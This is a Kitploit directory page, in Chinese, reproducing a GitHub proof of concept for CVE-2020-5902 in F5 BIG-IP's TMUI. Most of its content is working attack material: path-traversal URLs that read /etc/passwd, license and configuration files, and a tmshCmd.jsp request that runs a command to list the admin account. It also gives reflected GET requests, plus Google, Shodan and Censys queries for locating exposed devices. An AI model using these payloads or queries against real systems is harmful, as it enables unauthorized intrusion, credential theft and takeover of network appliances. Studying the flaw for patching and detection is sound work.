Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-5902 — CVE-2020-5902的概念验证漏洞利用代码,针对F5 BIG-IP TMUI中的远程代码执行漏洞,包含文件读取和命令执行载荷,以及用于Shodan和Censys的侦察查询。 | Kitploit
工具/GitHubGitHub/dnerzker/cve-2020-5902
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集
GitHubdnerzker/cve-2020-5902

CVE-2020-5902

CVE-2020-5902的概念验证漏洞利用代码,针对F5 BIG-IP TMUI中的远程代码执行漏洞,包含文件读取和命令执行载荷,以及用于Shodan和Censys的侦察查询。

查看仓库
6年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-5902

摘要

在 BIG-IP 版本 15.0.0-15.1.0.3、14.1.0-14.1.2.5、13.1.0-13.1.3.3、12.1.0-12.1.5.1 和 11.6.1-11.6.5.1 中,流量管理用户界面(TMUI),也称为配置实用程序,在未公开的页面上存在远程代码执行(RCE)漏洞。

概念验证

root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin 
root@kitploit:~
 	GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
	GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=randomstuff
	GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp 
	GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse

inurl://"tmui/login.jsp"
intitle://"BIG-IP" inurl://"tmui"

~~ 尝试使用以下 Shodan 查询:
	1. F5-login-pages
	2. www-authenticate: Basic realm:BIG-IP
	3. BigIP / BIG-IP
	4. htt.favicon.hash:-335242539
	5. http.title:"BIG-IP&req:- Redirect"
~~ 尝试使用以下 Censys 查询:
	1.433.https.get.body_sha256:5d78eb6fa93b995f9af90b632f0016e80dbcda8eb71a17994678692585ee5
	2.433.https.get.title:"BIG-IP&req:- Redirect" 

##你好##

root@kitploit:~
我是 Rizki Ardian
你今天好吗?  
下载工具